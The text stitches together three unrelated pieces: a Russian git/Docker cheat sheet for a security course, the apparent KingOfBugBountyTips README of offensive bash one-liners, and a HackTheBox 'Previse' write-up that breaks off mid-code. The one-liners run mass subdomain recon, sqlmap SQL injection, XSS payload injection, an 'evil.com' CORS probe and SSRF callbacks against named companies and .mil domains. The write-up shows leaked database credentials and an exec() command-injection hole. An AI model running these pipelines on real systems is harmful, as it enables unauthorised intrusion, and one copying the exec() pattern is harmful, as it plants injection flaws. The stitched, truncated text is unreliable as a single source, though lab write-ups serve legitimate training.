https://git-scm.com/book/ru/v1/%D0%92%D0%B2%D0%B5%D0%B4%D0%B5%D0%BD%D0%B8%D0%B5-%D0%A3%D1%81%D1%82%D0%B0%D0%BD%D0%BE%D0%B2%D0%BA%D0%B0-Git Указание авторства: - `git config --global user.name "<your_nickname>"` - `git config --global user.email "<your_email>"` Клонирование репозитория: - `git clone https://github.com/act1on3/shift2019.git` Перейти на новую ветку: - `git checkout -b <branch_name>` - `git push --set-upstream origin <branch_name>` Обновить локальный репозиторий из удаленного: - `git pull` Добавление измененных файлов и коммит своих изменений: - `git status` - `git add <filename>` - `git commit` - пишете описание коммита Отправка локальных изменений в репозиторий: - `git push` ### Docker Установка: - Windows https://docs.docker.com/docker-for-windows/install/ - Ubuntu https://docs.docker.com/install/linux/docker-ce/ubuntu/ - Debian https://docs.docker.com/install/linux/docker-ce/debian/ - MacOS https://docs.docker.com/docker-for-mac/install/ Создать образ: - `cd open_redirect` - `docker build -t open_redirect .` - `docker run -p 8080:80 open_redirect` или добавить ключ `-d` для отправки в daemon-режим Закрыть все контейнеры: - ```docker rm -f `docker ps -a -q` ``` Удалить образы: - `docker images` - `docker image rm <image_name>` Удалить все промежуточные образы (создаются во время билда): - ```docker rmi `docker images -f "dangling=true" -q` ```
## 👑 What is KingOfOneLineTips Project ? 👑 Our main goal is to share tips from some well-known bughunters. Using recon methodology, we are able to find subdomains, apis, and tokens that are already exploitable, so we can report them. We wish to influence Onelinetips and explain the commands, for the better understanding of new hunters.. Want to earn 100 dollars using my code on ocean-digital? https://m.do.co/c/703ff752fd6f ## Join Us [![Telegram](https://patrolavia.github.io/telegram-badge/chat.png)](https://t.me/joinchat/DN_iQksIuhyPKJL1gw0ttA) [![The King](https://aleen42.github.io/badges/src/twitter.svg)](https://twitter.com/ofjaaah) ## Special thanks - [@Stokfredrik](https://twitter.com/stokfredrik) - [@Jhaddix](https://twitter.com/Jhaddix) - [@pdiscoveryio](https://twitter.com/pdiscoveryio) - [@TomNomNom](https://twitter.com/TomNomNom) - [@jeff_foley](https://twitter.com/@jeff_foley) - [@NahamSec](https://twitter.com/NahamSec) - [@j3ssiejjj](https://twitter.com/j3ssiejjj) - [@zseano](https://twitter.com/zseano) - [@pry0cc](https://twitter.com/pry0cc) ## Scripts that need to be installed To run the project, you will need to install the following programs: - [Anew](https://github.com/tomnomnom/anew) - [Qsreplace](https://github.com/tomnomnom/qsreplace) - [Subfinder](https://github.com/projectdiscovery/subfinder) - [Gospider](https://github.com/jaeles-project/gospider) - [Github-Search](https://github.com/gwen001/github-search) - [Amass](https://github.com/OWASP/Amass) - [Hakrawler](https://github.com/hakluke/hakrawler) - [Gargs](https://github.com/brentp/gargs) - [Chaos](https://github.com/projectdiscovery/chaos-client) - [Httpx](https://github.com/projectdiscovery/httpx) - [Jaeles](https://github.com/jaeles-project/jaeles) - [Findomain](https://github.com/Edu4rdSHL/findomain) - [Gf](https://github.com/tomnomnom/gf) - [Unew](https://github.com/dwisiswant0/unew) - [Rush](https://github.com/shenwei356/rush) - [Jsubfinder](https://github.com/hiddengearz/jsubfinder) - [Shuffledns](https://github.com/projectdiscovery/shuffledns) - [haktldextract](https://github.com/hakluke/haktldextract) - [Gau](https://github.com/lc/gau) - [Axiom](https://github.com/pry0cc/axiom) - [Dalfox](https://github.com/hahwul/dalfox) ### OneLiners ### Axiom recon "complete" - [Explaining command](https://bit.ly/2NIavul) ```bash findomain -t domain -q -u url ; axiom-scan url -m subfinder -o subs --threads 3 ; axiom-scan subs -m httpx -o http ; axiom-scan http -m ffuf --threads 15 -o ffuf-output ; cat ffuf-output | tr "," " " | awk '{print $2}' | fff | grep 200 | sort -u ``` ### Domain subdomain extraction - [Explaining command](https://bit.ly/3c2t6eG) ```bash cat url | haktldextract -s -t 16 | tee subs.txt ; xargs -a subs.txt -I@ sh -c 'assetfinder -subs-only @ | anew | httpx -silent -threads 100 | anew httpDomain' ``` ### Search .js using - [Explaining command](https://bit.ly/362LyQF) ```bash assetfinder -subs-only DOMAIN -silent | httpx -timeout 3 -threads 300 --follow-redirects -silent | xargs -I% -P10 sh -c 'hakrawler -plain -linkfinder -depth 5 -url %' | awk '{print $3}' | grep -E "\.js(?:onp?)?$" | anew ``` ### This one was huge ... But it collects .js gau + wayback + gospider and makes an analysis of the js. tools you need below. - [Explaining command](https://bit.ly/3sD0pLv) ```bash cat dominios | gau |grep -iE '\.js'|grep -iEv '(\.jsp|\.json)' >> gauJS.txt ; cat dominios | waybackurls | grep -iE '\.js'|grep -iEv '(\.jsp|\.json)' >> waybJS.txt ; gospider -a -S dominios -d 2 | grep -Eo "(http|https)://[^/\"].*\.js+" | sed "s#\] \- #\n#g" >> gospiderJS.txt ; cat gauJS.txt waybJS.txt gospiderJS.txt | sort -u >> saidaJS ; rm -rf *.txt ; cat saidaJS | anti-burl |awk '{print $4}' | sort -u >> AliveJs.txt ; xargs -a AliveJs.txt -n 2 -I@ bash -c "echo -e '\n[URL]: @\n'; python3 linkfinder.py -i @ -o cli" ; cat AliveJs.txt | python3 collector.py output ; rush -i output/urls.txt 'python3 SecretFinder.py -i {} -o cli | sort -u >> output/resultJSPASS' ``` ### My recon automation simple. OFJAAAH.sh - [Explaining command](https://bit.ly/3nWHM22) ```bash amass enum -d $1 -o amass1 ; chaos -d $1 -o chaos1 -silent ; assetfinder $1 >> assetfinder1 ; subfinder -d $1 -o subfinder1 ; findomain -t $1 -q -u findomain1 ;python3 /root/PENTESTER/github-search/github-subdomains.py -t YOURTOKEN -d $1 >> github ; cat assetfinder1 subfinder1 chaos1 amass1 findomain1 subfinder1 github >> hosts ; subfinder -dL hosts -o full -timeout 10 -silent ; httpx -l hosts -silent -threads 9000 -timeout 30 | anew domains ; rm -rf amass1 chaos1 assetfinder1 subfinder1 findomain1 github ``` ### Download all domains to bounty chaos - [Explaining command](https://bit.ly/38wPQ4o) ```bash wget https://raw.githubusercontent.com/KingOfBugbounty/KingOfBugBountyTips/master/downlink ; xargs -a downlink -I@ sh -c 'wget @ -q'; mkdir bounty ; unzip '*.zip' -d bounty/ ; rm -rf *zip ; cat bounty/*.txt >> allbounty ; sort -u allbounty >> domainsBOUNTY ; rm -rf allbounty bounty/ ; echo '@OFJAAAH' ``` ### Recon to search SSRF Test - [Explaining command](https://bit.ly/3shFFJ5) ```bash findomain -t DOMAIN -q | httpx -silent -threads 1000 | gau | grep "=" | qsreplace http://YOUR.burpcollaborator.net ``` ### ShuffleDNS to domains in file scan nuclei. - [Explaining command](https://bit.ly/2L3YVsc) ```bash xargs -a domain -I@ -P500 sh -c 'shuffledns -d "@" -silent -w words.txt -r resolvers.txt' | httpx -silent -threads 1000 | nuclei -t /root/nuclei-templates/ -o re1 ``` ### Search Asn Amass - [Explaining command](https://bit.ly/2EMooDB) Amass intel will search the organization "paypal" from a database of ASNs at a faster-than-default rate. It will then take these ASN numbers and scan the complete ASN/IP space for all tld's in that IP space (paypal.com, paypal.co.id, paypal.me) ```bash amass intel -org paypal -max-dns-queries 2500 | awk -F, '{print $1}' ORS=',' | sed 's/,$//' | xargs -P3 -I@ -d ',' amass intel -asn @ -max-dns-queries 2500'' ``` ### SQLINJECTION Mass domain file - [Explaining command](https://bit.ly/354lYuf) ```bash httpx -l domains -silent -threads 1000 | xargs -I@ sh -c 'findomain -t @ -q | httpx -silent | anew | waybackurls | gf sqli >> sqli ; sqlmap -m sqli --batch --random-agent --level 1' ``` ### Using chaos search js - [Explaining command](https://bit.ly/32vfRg7) Chaos is an API by Project Discovery that discovers subdomains. Here we are querying thier API for all known subdoains of "att.com". We are then using httpx to find which of those domains is live and hosts an HTTP or HTTPs site. We then pass those URLs to GoSpider to visit them and crawl them for all links (javascript, endpoints, etc). We then grep to find all the JS files. We pipe this all through anew so we see the output iterativlely (faster) and grep for "(http|https)://att.com" to make sure we dont recieve output for domains that are not "att.com". ```bash chaos -d att.com | httpx -silent | xargs -I@ -P20 sh -c 'gospider -a -s "@" -d 2' | grep -Eo "(http|https)://[^/"].*.js+" | sed "s#] ``` ### Search Subdomain using Gospider - [Explaining command](https://bit.ly/2QtG9do) GoSpider to visit them and crawl them for all links (javascript, endpoints, etc) we use some blacklist, so that it doesn’t travel, not to delay, grep is a command-line utility for searching plain-text data sets for lines that match a regular expression to search HTTP and HTTPS ```bash gospider -d 0 -s "https://site.com" -c 5 -t 100 -d 5 --blacklist jpg,jpeg,gif,css,tif,tiff,png,ttf,woff,woff2,ico,pdf,svg,txt | grep -Eo '(http|https)://[^/"]+' | anew ``` ### Using gospider to chaos - [Explaining command](https://bit.ly/2D4vW3W) GoSpider to visit them and crawl them for all links (javascript, endpoints, etc) chaos is a subdomain search project, to use it needs the api, to xargs is a command on Unix and most Unix-like operating systems used to build and execute commands from standard input. ```bash chaos -d paypal.com -bbq -filter-wildcard -http-url | xargs -I@ -P5 sh -c 'gospider -a -s "@" -d 3' ``` ### Using recon.dev and gospider crawler subdomains - [Explaining command](https://bit.ly/32pPRDa) We will use recon.dev api to extract ready subdomains infos, then parsing output json with jq, replacing with a Stream EDitor all blank spaces If anew, we can sort and display unique domains on screen, redirecting this output list to httpx to create a new list with just alive domains. Xargs is being used to deal with gospider with 3 parallel proccess and then using grep within regexp just taking http urls. ```bash curl "https://recon.dev/api/search?key=apiKEY&domain=paypal.com" |jq -r '.[].rawDomains[]' | sed 's/ //g' | anew |httpx -silent | xargs -P3 -I@ gospider -d 0 -s @ -c 5 -t 100 -d 5 --blacklist jpg,jpeg,gif,css,tif,tiff,png,ttf,woff,woff2,ico,pdf,svg,txt | grep -Eo '(http|https)://[^/"]+' | anew ``` ### PSQL - search subdomain using cert.sh - [Explaining command](https://bit.ly/32rMA6e) Make use of pgsql cli of crt.sh, replace all comma to new lines and grep just twitch text domains with anew to confirm unique outputs ```bash psql -A -F , -f querycrt -h http://crt.sh -p 5432 -U guest certwatch 2>/dev/null | tr ', ' '\n' | grep twitch | anew ``` ### Search subdomains using github and httpx - [Github-search](https://github.com/gwen001/github-search) Using python3 to search subdomains, httpx filter hosts by up status-code response (200) ```python ./github-subdomains.py -t APYKEYGITHUB -d domaintosearch | httpx --title ``` ### Search SQLINJECTION using qsreplace search syntax error - [Explained command](https://bit.ly/3hxFWS2) ```bash grep "=" .txt| qsreplace "' OR '1" | httpx -silent -store-response-dir output -threads 100 | grep -q -rn "syntax\|mysql" output 2>/dev/null && \printf "TARGET \033[0;32mCould Be Exploitable\e[m\n" || printf "TARGET \033[0;31mNot Vulnerable\e[m\n" ``` ### Search subdomains using jldc - [Explained command](https://bit.ly/2YBlEjm) ```bash curl -s "https://jldc.me/anubis/subdomains/att.com" | grep -Po "((http|https):\/\/)?(([\w.-]*)\.([\w]*)\.([A-z]))\w+" | anew ``` ### Search subdomains in assetfinder using hakrawler spider to search links in content responses - [Explained command](https://bit.ly/3hxRvZw) ```bash assetfinder -subs-only tesla.com -silent | httpx -timeout 3 -threads 300 --follow-redirects -silent | xargs -I% -P10 sh -c 'hakrawler -plain -linkfinder -depth 5 -url %' | grep "tesla" ``` ### Search subdomains in cert.sh - [Explained command](https://bit.ly/2QrvMXl) ```bash curl -s "https://crt.sh/?q=%25.att.com&output=json" | jq -r '.[].name_value' | sed 's/\*\.//g' | httpx -title -silent | anew ``` ### Search subdomains in cert.sh assetfinder to search in link /.git/HEAD - [Explained command](https://bit.ly/3lhFcTH) ```bash curl -s "https://crt.sh/?q=%25.tesla.com&output=json" | jq -r '.[].name_value' | assetfinder -subs-only | sed 's#$#/.git/HEAD#g' | httpx -silent -content-length -status-code 301,302 -timeout 3 -retries 0 -ports 80,8080,443 -threads 500 -title | anew ``` ```bash curl -s "https://crt.sh/?q=%25.enjoei.com.br&output=json" | jq -r '.[].name_value' | assetfinder -subs-only | httpx -silent -path /.git/HEAD -content-length -status-code 301,302 -timeout 3 -retries 0 -ports 80,8080,443 -threads 500 -title | anew ``` ### Collect js files from hosts up by gospider - [Explained command](https://bit.ly/3aWIwyI) ```bash xargs -P 500 -a pay -I@ sh -c 'nc -w1 -z -v @ 443 2>/dev/null && echo @' | xargs -I@ -P10 sh -c 'gospider -a -s "https://@" -d 2 | grep -Eo "(http|https)://[^/\"].*\.js+" | sed "s#\] \- #\n#g" | anew' ``` ### Subdomain search Bufferover resolving domain to httpx - [Explained command](https://bit.ly/3lno9j0) ```bash curl -s https://dns.bufferover.run/dns?q=.sony.com |jq -r .FDNS_A[] | sed -s 's/,/\n/g' | httpx -silent | anew ``` ### Using gargs to gospider search with parallel proccess - [Gargs](https://github.com/brentp/gargs) - [Explained command](https://bit.ly/2EHj1FD) ```bash httpx -ports 80,443,8009,8080,8081,8090,8180,8443 -l domain -timeout 5 -threads 200 --follow-redirects -silent | gargs -p 3 'gospider -m 5 --blacklist pdf -t 2 -c 300 -d 5 -a -s {}' | anew stepOne ``` ### Injection xss using qsreplace to urls filter to gospider - [Explained command](https://bit.ly/3joryw9) ```bash gospider -S domain.txt -t 3 -c 100 | tr " " "\n" | grep -v ".js" | grep "https://" | grep "=" | qsreplace '%22><svg%20onload=confirm(1);>' ``` ### Extract URL's to apk - [Explained command](https://bit.ly/2QzXwJr) ```bash apktool d app.apk -o uberApk;grep -Phro "(https?://)[\w\.-/]+[\"'\`]" uberApk/ | sed 's#"##g' | anew | grep -v "w3\|android\|github\|schemas.android\|google\|goo.gl" ``` ### Chaos to Gospider - [Explained command](https://bit.ly/3gFJbpB) ```bash chaos -d att.com -o att -silent | httpx -silent | xargs -P100 -I@ gospider -c 30 -t 15 -d 4 -a -H "x-forwarded-for: 127.0.0.1" -H "User-Agent: Mozilla/5.0 (Linux; U; Android 2.2) AppleWebKit/533.1 (KHTML, like Gecko) Version/4.0 Mobile Safari/533.1" -s @ ``` ### Checking invalid certificate - [Real script](https://bit.ly/2DhAwMo) - [Script King](https://bit.ly/34Z0kIH) ```bash xargs -a domain -P1000 -I@ sh -c 'bash cert.sh @ 2> /dev/null' | grep "EXPIRED" | awk '/domain/{print $5}' | httpx ``` ### Using shodan & Nuclei - [Explained command](https://bit.ly/3jslKle) Shodan is a search engine that lets the user find specific types of computers connected to the internet, AWK Cuts the text and prints the third column. httpx is a fast and multi-purpose HTTP using -silent. Nuclei is a fast tool for configurable targeted scanning based on templates offering massive extensibility and ease of use, You need to download the nuclei templates. ```bash shodan domain DOMAIN TO BOUNTY | awk '{print $3}' | httpx -silent | nuclei -t /nuclei-templates/ ``` ### Open Redirect test using gf. - [Explained command](https://bit.ly/3hL263x) echo is a command that outputs the strings it is being passed as arguments. What to Waybackurls? Accept line-delimited domains on stdin, fetch known URLs from the Wayback Machine for .domain.com and output them on stdout. Httpx? is a fast and multi-purpose HTTP. GF? A wrapper around grep to avoid typing common patterns and anew Append lines from stdin to a file, but only if they don't already appear in the file. Outputs new lines to stdout too, removes duplicates. ```bash echo "domain" | waybackurls | httpx -silent -timeout 2 -threads 100 | gf redirect | anew ``` ### Using shodan to jaeles "How did I find a critical today? well as i said it was very simple, using shodan and jaeles". - [Explained command](https://bit.ly/2QQfY0l) ```bash shodan domain domain| awk '{print $3}'| httpx -silent | anew | xargs -I@ jaeles scan -c 100 -s /jaeles-signatures/ -u @ ``` ### Using Chaos to jaeles "How did I find a critical today?. - [Explained command](https://bit.ly/2YXiK8N) To chaos this project to projectdiscovery, Recon subdomains, using httpx, if we see the output from chaos domain.com we need it to be treated as http or https, so we use httpx to get the results. We use anew, a tool that removes duplicates from @TomNomNom, to get the output treated for import into jaeles, where he will scan using his templates. ```bash chaos -d domain | httpx -silent | anew | xargs -I@ jaeles scan -c 100 -s /jaeles-signatures/ -u @ ``` ### Using shodan to jaeles - [Explained command](https://bit.ly/2Dkmycu) ```bash domain="domaintotest";shodan domain $domain | awk -v domain="$domain" '{print $1"."domain}'| httpx -threads 300 | anew shodanHostsUp | xargs -I@ -P3 sh -c 'jaeles -c 300 scan -s jaeles-signatures/ -u @'| anew JaelesShodanHosts ``` ### Search to files using assetfinder and ffuf - [Explained command](https://bit.ly/2Go3Ba4) ```bash assetfinder att.com | sed 's#*.# #g' | httpx -silent -threads 10 | xargs -I@ sh -c 'ffuf -w path.txt -u @/FUZZ -mc 200 -H "Content-Type: application/json" -t 150 -H "X-Forwarded-For:127.0.0.1"' ``` ### HTTPX using new mode location and injection XSS using qsreplace. - [Explained command](https://bit.ly/2Go3Ba4) ```bash httpx -l master.txt -silent -no-color -threads 300 -location 301,302 | awk '{print $2}' | grep -Eo '(http|https)://[^/"].*' | tr -d '[]' | anew | xargs -I@ sh -c 'gospider -d 0 -s @' | tr ' ' '\n' | grep -Eo '(http|https)://[^/"].*' | grep "=" | qsreplace "<svg onload=alert(1)>" "' ``` ### Scanning XSS with Gospider and Dalfox - [Explained command](https://bit.ly/3t9Y2Qh) ```bash gospider -S httpx.txt -c 10 -d 5 --blacklist ".(jpg|jpeg|gif|css|tif|tiff|png|ttf|woff|woff2|ico|pdf|svg|txt)" --other-source | grep -e "code-200" | awk '{print $5}'| grep "=" | qsreplace -a | dalfox pipe -b your_blind_xss_callback_domain | tee result.txt ``` ### Grap internal juicy paths and do requests to them. - [Explained command](https://bit.ly/357b1IY) ```bash export domain="https://target";gospider -s $domain -d 3 -c 300 | awk '/linkfinder/{print $NF}' | grep -v "http" | grep -v "http" | unfurl paths | anew | xargs -I@ -P50 sh -c 'echo $domain@ | httpx -silent -content-length' ``` ### Download to list bounty targets We inject using the sed .git/HEAD command at the end of each url. - [Explained command](https://bit.ly/2R2gNn5) ```bash wget https://raw.githubusercontent.com/arkadiyt/bounty-targets-data/master/data/domains.txt -nv | cat domains.txt | sed 's#$#/.git/HEAD#g' | httpx -silent -content-length -status-code 301,302 -timeout 3 -retries 0 -ports 80,8080,443 -threads 500 -title | anew ``` ### Using to findomain to SQLINJECTION. - [Explained command](https://bit.ly/2ZeAhcF) ```bash findomain -t testphp.vulnweb.com -q | httpx -silent | anew | waybackurls | gf sqli >> sqli ; sqlmap -m sqli --batch --random-agent --level 1 ``` ### Jaeles scan to bugbounty targets. - [Explained command](https://bit.ly/3jXbTnU) ```bash wget https://raw.githubusercontent.com/arkadiyt/bounty-targets-data/master/data/domains.txt -nv ; cat domains.txt | anew | httpx -silent -threads 500 | xargs -I@ jaeles scan -s /jaeles-signatures/ -u @ ``` ### JLDC domain search subdomain, using rush and jaeles. - [Explained command](https://bit.ly/3hfNV5k) ```bash curl -s "https://jldc.me/anubis/subdomains/sony.com" | grep -Po "((http|https):\/\/)?(([\w.-]*)\.([\w]*)\.([A-z]))\w+" | httpx -silent -threads 300 | anew | rush -j 10 'jaeles scan -s /jaeles-signatures/ -u {}' ``` ### Chaos to search subdomains check cloudflareip scan port. - [Explained command](https://bit.ly/3hfNV5k) ```bash chaos -silent -d paypal.com | filter-resolved | cf-check | anew | naabu -rate 60000 -silent -verify | httpx -title -silent ``` ### Search JS to domains file. - [Explained command](https://bit.ly/2Zs13yj) ```bash cat FILE TO TARGET | httpx -silent | subjs | anew ``` ### Search JS using assetfinder, rush and hakrawler. - [Explained command](https://bit.ly/3ioYuV0) ```bash assetfinder -subs-only paypal.com -silent | httpx -timeout 3 -threads 300 --follow-redirects -silent | rush 'hakrawler -plain -linkfinder -depth 5 -url {}' | grep "paypal" ``` ### Search to CORS using assetfinder and rush - [Explained command](https://bit.ly/33qT71x) ```bash assetfinder fitbit.com | httpx -threads 300 -follow-redirects -silent | rush -j200 'curl -m5 -s -I -H "Origin:evil.com" {} | [[ $(grep -c "evil.com") -gt 0 ]] && printf "\n\033[0;32m[VUL TO CORS] - {}\e[m"' 2>/dev/null" ``` ### Search to js using hakrawler and rush & unew - [Explained command](https://bit.ly/2Rqn9gn) ```bash tac hostsGospider | rush -j 100 'hakrawler -js -plain -usewayback -depth 6 -scope subs -url {} | unew hakrawlerHttpx' ``` ### XARGS to dirsearch brute force. - [Explained command](https://bit.ly/32MZfCa) ```bash cat hosts | xargs -I@ sh -c 'python3 dirsearch.py -r -b -w path -u @ -i 200, 403, 401, 302 -e php,html,json,aspx,sql,asp,js' ``` ### Assetfinder to run massdns. - [Explained command](https://bit.ly/32T5W5O) ```bash assetfinder DOMAIN --subs-only | anew | massdns -r lists/resolvers.txt -t A -o S -w result.txt ; cat result.txt | sed 's/A.*//; s/CN.*// ; s/\..$//' | httpx -silent ``` ### Extract path to js - [Explained command](https://bit.ly/3icrr5R) ```bash cat file.js | grep -aoP "(?<=(\"|\'|\`))\/[a-zA-Z0-9_?&=\/\-\#\.]*(?=(\"|\'|\`))" | sort -u ``` ### Find subdomains and Secrets with jsubfinder - [Explained command](https://bit.ly/3dvP6xq) ```bash cat subdomsains.txt | httpx --silent | jsubfinder -s ``` ### Search domains to Range-IPS. - [Explained command](https://bit.ly/3fa0eAO) ```bash cat dod1 | awk '{print $1}' | xargs -I@ sh -c 'prips @ | hakrevdns -r 1.1.1.1' | awk '{print $2}' | sed -r 's/.$//g' | httpx -silent -timeout 25 | anew ``` ### Search new's domains using dnsgen. - [Explained command](https://bit.ly/3kNTHNm) ```bash xargs -a army1 -I@ sh -c 'echo @' | dnsgen - | httpx -silent -threads 10000 | anew newdomain ``` ### List ips, domain extract, using amass + wordlist - [Explained command](https://bit.ly/2JpRsmS) ```bash amass enum -src -ip -active -brute -d navy.mil -o domain ; cat domain | cut -d']' -f 2 | awk '{print $1}' | sort -u > hosts-amass.txt ; cat domain | cut -d']' -f2 | awk '{print $2}' | tr ',' '\n' | sort -u > ips-amass.txt ; curl -s "https://crt.sh/?q=%.navy.mil&output=json" | jq '.[].name_value' | sed 's/\"//g' | sed 's/\*\.//g' | sort -u > hosts-crtsh.txt ; sed 's/$/.navy.mil/' dns-Jhaddix.txt_cleaned > hosts-wordlist.txt ; cat hosts-amass.txt hosts-crtsh.txt hosts-wordlist.txt | sort -u > hosts-all.txt ``` ### Search domains using amass and search vul to nuclei. - [Explained command](https://bit.ly/3gsbzNt) ```bash amass enum -passive -norecursive -d disa.mil -o domain ; httpx -l domain -silent -threads 10 | nuclei -t PATH -o result -timeout 30 ``` ### Verify to cert using openssl. - [Explained command](https://bit.ly/37avq0C) ```bash sed -ne 's/^\( *\)Subject:/\1/p;/X509v3 Subject Alternative Name/{ N;s/^.*\n//;:a;s/^\( *\)\(.*\), /\1\2\n\1/;ta;p;q; }' < <( openssl x509 -noout -text -in <( openssl s_client -ign_eof 2>/dev/null <<<$'HEAD / HTTP/1.0\r\n\r' \ -connect hackerone.com:443 ) ) ``` ### Search domains using openssl to cert. - [Explained command](https://bit.ly/3m9AsOY) ```bash xargs -a recursivedomain -P50 -I@ sh -c 'openssl s_client -connect @:443 2>&1 '| sed -E -e 's/[[:blank:]]+/\n/g' | httpx -silent -threads 1000 | anew ``` ### Search to Hackers. - [Censys](https://censys.io) - [Spyce](https://spyce.com) - [Shodan](https://shodan.io) - [Viz Grey](https://viz.greynoise.io) - [Zoomeye](https://zoomeye.org) - [Onyphe](https://onyphe.io) - [Wigle](https://wigle.net) - [Intelx](https://intelx.io) - [Fofa](https://fofa.so) - [Hunter](https://hunter.io) - [Zorexeye](https://zorexeye.com) - [Pulsedive](https://pulsedive.com) - [Netograph](https://netograph.io) - [Vigilante](https://vigilante.pw) - [Pipl](https://pipl.com) - [Abuse](https://abuse.ch) - [Cert-sh](https://cert.sh) - [Maltiverse](https://maltiverse.com/search) - [Insecam](https://insecam.org) - [Anubis](https://https://jldc.me/anubis/subdomains/att.com) - [Dns Dumpster](https://dnsdumpster.com) - [PhoneBook](https://phonebook.cz) - [Inquest](https://labs.inquest.net) - [Scylla](https://scylla.sh) # Project [![made-with-Go](https://img.shields.io/badge/Made%20with-Go-1f425f.svg)](http://golang.org) [![made-with-bash](https://img.shields.io/badge/Made%20with-Bash-1f425f.svg)](https://www.gnu.org/software/bash/) [![Open Source? Yes!](https://badgen.net/badge/Open%20Source%20%3F/Yes%21/blue?icon=github)](https://github.com/Naereen/badges/) [![Telegram](https://patrolavia.github.io/telegram-badge/chat.png)](https://t.me/KingOfTipsBugBounty) <a href="https://www.buymeacoffee.com/OFJAAAH" target="_blank"><img src="https://www.buymeacoffee.com/assets/img/custom_images/orange_img.png" alt="Buy Me A Coffee" style="height: 20px !important;width: 50px !important;box-shadow: 0px 3px 2px 0px rgba(190, 190, 190, 0.5) !important;-webkit-box-shadow: 0px 3px 2px 0px rgba(190, 190, 190, 0.5) !important;" ></a>
# Previse - HackTheBox - Writeup Linux, 20 Base Points, Easy ## Machine ![‏‏Explore.JPG](images/Previse.JPG) ## TL;DR To solve this machine, we begin by enumerating open services using ```namp``` – finding ports ```22``` and ```80```. ***User***: Running ```gobuster``` and found ```acounts.php``` page, Using that we can create a new account, From the web portal we download ```SITEBACKUP.ZIP``` file which contains the code of ```logs.php```, By reading the code we found RCE on ```delim``` parameter and found also DB credentials on ```config.php``` file. Using the RCE on ```logs.php``` we get a reverse shell as ```www-data```, Cracking the hash of ```m4lwhere``` user which takes from DB and login as ```m4lwhere``` user. ***Root***: By running ```sudo -l``` we found ```/opt/scripts/access_backup.sh```, Because we have permission to change the ```PATH``` we just create our custom ```date``` command to get a reverse shell as ```root```. ![pwn.JPG](images/pwn.JPG) ## Previse Solution ### User Let's start with ```nmap``` scanning: ```console ┌─[evyatar@parrot]─[/hackthebox/Previse] └──╼ $ nmap -p- -v -sV -sC -oA nmap/Previse 10.129.158.215 Starting Nmap 7.80 ( https://nmap.org ) at 2021-08-10 00:14 IDT Nmap scan report for 10.129.158.215 Host is up (0.26s latency). Not shown: 998 closed ports PORT STATE SERVICE VERSION 22/tcp open ssh OpenSSH 7.6p1 Ubuntu 4ubuntu0.3 (Ubuntu Linux; protocol 2.0) | ssh-hostkey: | 2048 53:ed:44:40:11:6e:8b:da:69:85:79:c0:81:f2:3a:12 (RSA) | 256 bc:54:20:ac:17:23:bb:50:20:f4:e1:6e:62:0f:01:b5 (ECDSA) |_ 256 33:c1:89:ea:59:73:b1:78:84:38:a4:21:10:0c:91:d8 (ED25519) 80/tcp open http Apache httpd 2.4.29 ((Ubuntu)) | http-cookie-flags: | /: | PHPSESSID: |_ httponly flag not set |_http-server-header: Apache/2.4.29 (Ubuntu) | http-title: Previse Login |_Requested resource was login.php Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel Service detection performed. Please report any incorrect results at https://nmap.org/submit/ . Nmap done: 1 IP address (1 host up) scanned in 51.99 seconds ``` By observing port 80 we get the following web page: ![port80.JPG](images/port80.JPG) By running ```gobuster``` we found the following web page [http://10.129.158.215/nav.php](http://10.129.158.215/nav.php): ![nav.JPG](images/nav.JPG) Where ```Create Accounts``` page URL is [http://10.129.158.215/accounts.php](http://10.129.158.215/accounts.php), Let's try to browse this web page using BurpSuite: ![accounts.JPG](images/accounts.JPG) Let's observe the following HTML section: ```html ... <section class="uk-section uk-section-default"> <div class="uk-container"> <h2 class="uk-heading-divider">Add New Account</h2> <p>Create new user.</p> <p class="uk-alert-danger">ONLY ADMINS SHOULD BE ABLE TO ACCESS THIS PAGE!!</p> <p>Usernames and passwords must be between 5 and 32 characters!</p> </p> <form role="form" method="post" action="accounts.php"> <div class="uk-margin"> <div class="uk-inline"> <span class="uk-form-icon" uk-icon="icon: user"></span> <input type="text" name="username" class="uk-input" id="username" placeholder="Username"> </div> </div> <div class="uk-margin"> <div class="uk-inline"> <span class="uk-form-icon" uk-icon="icon: lock"></span> <input type="password" name="password" class="uk-input" id="password" placeholder="Password"> </div> </div> <div class="uk-margin"> <div class="uk-inline"> <span class="uk-form-icon" uk-icon="icon: lock"></span> <input type="password" name="confirm" class="uk-input" id="confirm" placeholder="Confirm Password"> </div> </div> <button type="submit" name="submit" class="uk-button uk-button-default">CREATE USER</button> </form> </div> </section> ``` We can make a POST request to this web page to create a new user as follow: ```HTTP POST /accounts.php HTTP/1.1 Host: 10.129.158.215 User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:78.0) Gecko/20100101 Firefox/78.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8 Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate Content-Type: application/x-www-form-urlencoded Content-Length: 52 Origin: http://10.129.158.215 DNT: 1 Connection: close Upgrade-Insecure-Requests: 1 username=evyatar9&password=evevev&confirm=evevev ``` Send it: ![usercreated.JPG](images/usercreated.JPG) Great, Let's logi n using those credentials, we can see the following web page: ![login.JPG](images/login.JPG) By clicking on the ```Files``` button we get the following web page: ![files.JPG](images/files.JPG) The file ```SITEBACKUP.ZIP``` contains the following content: ```console ┌─[evyatar@parrot]─[/hackthebox/Previse/sitesbackup] └──╼ $ ls accounts.php download.php files.php header.php login.php logs.php status.php config.php file_logs.php footer.php index.php logout.php nav.php ``` By observing ```config.php``` we found the following credentials that maybe we need later: ```php <?php function connectDB(){ $host = 'localhost'; $user = 'root'; $passwd = 'mySQL_p@ssw0rd!:)'; $db = 'previse'; $mycon = new mysqli($host, $user, $passwd, $db); return $mycon; } ?> ``` By clicking on ```Managment Data -> Log Data``` we get the following page: ![logs.JPG](images/logs.JPG) By clicking on Submit button It's make request to ```/logs.php```, Let's observe the code of ```logs.php```: ```php <?php session_start(); if (!isset($_SESSION['user'])) { header('Location: login.php'); exit; } ?> <?php if (!$_SERVER['REQUEST_METHOD'] == 'POST') { header('Location: login.php'); exit; } ///////////////////////////////////////////////////////////////////////////////////// //I tried really hard to parse the log delims in PHP, but python was SO MUCH EASIER// ///////////////////////////////////////////////////////////////////////////////////// $output = exec("/usr/bin/python /opt/scripts/log_process.py {$_POST['delim']}"); echo $output; $filepath = "/var/www/out.log"; $filename = "out.log"; if(file_exists($filepath)) { header('Content-Description: File Transfer'); header('Content-Type: application/octet-stream'); header('Content-Disposition: attachment; filename="'.basename($filepath).'"'); header('Expires: 